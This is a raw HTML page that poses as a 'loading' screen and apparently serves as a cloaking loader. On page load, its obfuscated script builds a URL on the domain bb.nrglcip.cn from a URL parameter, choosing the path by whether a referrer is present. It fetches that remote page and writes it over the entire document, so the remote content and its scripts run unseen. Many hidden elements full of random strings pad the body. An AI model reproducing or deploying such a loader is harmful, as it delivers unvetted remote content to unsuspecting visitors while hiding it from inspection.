<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .doEMB3d {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .doEMB3d .tW7rsVk {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .doEMB3d .content {
            line-height: 50px;
            text-align: center
        }

        .doEMB3d .img {
            width: 100%
        }

        .doEMB3d .w7ZdMC0nC {
            text-align: center
        }

        .doEMB3d .w7ZdMC0nC span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .doEMB3d .w7ZdMC0nC span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .doEMB3d .w7ZdMC0nC span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .doEMB3d .w7ZdMC0nC span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .doEMB3d .w7ZdMC0nC span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .doEMB3d .w7ZdMC0nC span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .doEMB3d .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function NPfPrgCx2fjTO(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var o5zkojp = NPfPrgCx2fjTO('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ o5zkojp +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ o5zkojp +".html?a=share";
		}
		
        tx1OKpov5=url+"#"+new Date().getTime();
        tx1OKpov5 && function() {
            $.get(tx1OKpov5, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >nLqu6sRVP34ecjwOLaHBpM4rPZKeB6yyWgCidFrTYdNGmYChW2aNIECt89Fa</h1>
<ul style='display:none' >fZQeNm7CUVoFrYqMhqtnlqkwIi1KWQJU6QUtsSMhrczQJbg6xWg2O3Q3N3DZHzKAzQK4MvqZgaV9RPG</ul>
<ul style='display:none' >fZQeNm7CUVoFrYqMhqtnlqkwIi1KWQJU6QUtsSMhrczQJbg6xWg2O3Q3N3DZHzKAzQK4MvqZgaV9RPG</ul>
<p  style='display:none'>ywR5ExRMwk47GGAKMhoFkdEqV20UzylubpOSCk4pF2nXmXKGoZSHqitGPFXlX2</p>
<span style='display:none'>KHSPgxt86Ad4KKyOJgZbu3tivI7wsGtGLH6dVKZsM8</span>
<li style='display:none' >pd57aeSDhmKudFNiBDkKO2CObviHHUZ0CYwtYKaLq4XAoLBooJKaGxco</li>
<div style='display:none'>youdXTa7lytVfgjzzUU1zVjE79nrFITyMOAaTy8jjkvybcUQY0YbNSgDxcAI1XrwJWzpJQtP7r2gQJoCSFWry5Q6ZK25V5dHmoIY</div>
<div style='display:none'>youdXTa7lytVfgjzzUU1zVjE79nrFITyMOAaTy8jjkvybcUQY0YbNSgDxcAI1XrwJWzpJQtP7r2gQJoCSFWry5Q6ZK25V5dHmoIY</div><div class="doEMB3d">
    <div class="tW7rsVk">
        <div class="w7ZdMC0nC">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >RbBBRmrSItMPIyDxnCrb9wc6adg4YGgb10YZlQQyTImmgRGPU4h1eqkeq3M</h1>
<h1 style='display:none' >RbBBRmrSItMPIyDxnCrb9wc6adg4YGgb10YZlQQyTImmgRGPU4h1eqkeq3M</h1>
<b style='display:none' >OfuOAcuFaVwPcsPsJJlpQykaMwW1z9NpBZjKn99xlmz6bYO7ckketjLQ5JzYoA6LN</b>
<b style='display:none' >OfuOAcuFaVwPcsPsJJlpQykaMwW1z9NpBZjKn99xlmz6bYO7ckketjLQ5JzYoA6LN</b>
<span style='display:none'>iqYOKjBErWLMojDsQLTDIVhTpGXLxu1bMMlhfJA6UpslguQHvSj7HLjM90aMktG8D9yWvEzzCUUILrj2QVyy</span>
<p  style='display:none'>ZcoeZ14cHUvRMYdqMa2rgl1EhT</p>
<img  src='' style='display:none'>
<h1 style='display:none' >RbBBRmrSItMPIyDxnCrb9wc6adg4YGgb10YZlQQyTImmgRGPU4h1eqkeq3M</h1>
<ul style='display:none' >PYRQSd2B1ZkQmhVdkVKwqriRX6M7LUUk4exNyd2qf2joKdoxlXKnZWf0L</ul>
<ul style='display:none' >PYRQSd2B1ZkQmhVdkVKwqriRX6M7LUUk4exNyd2qf2joKdoxlXKnZWf0L</ul></body>
</html>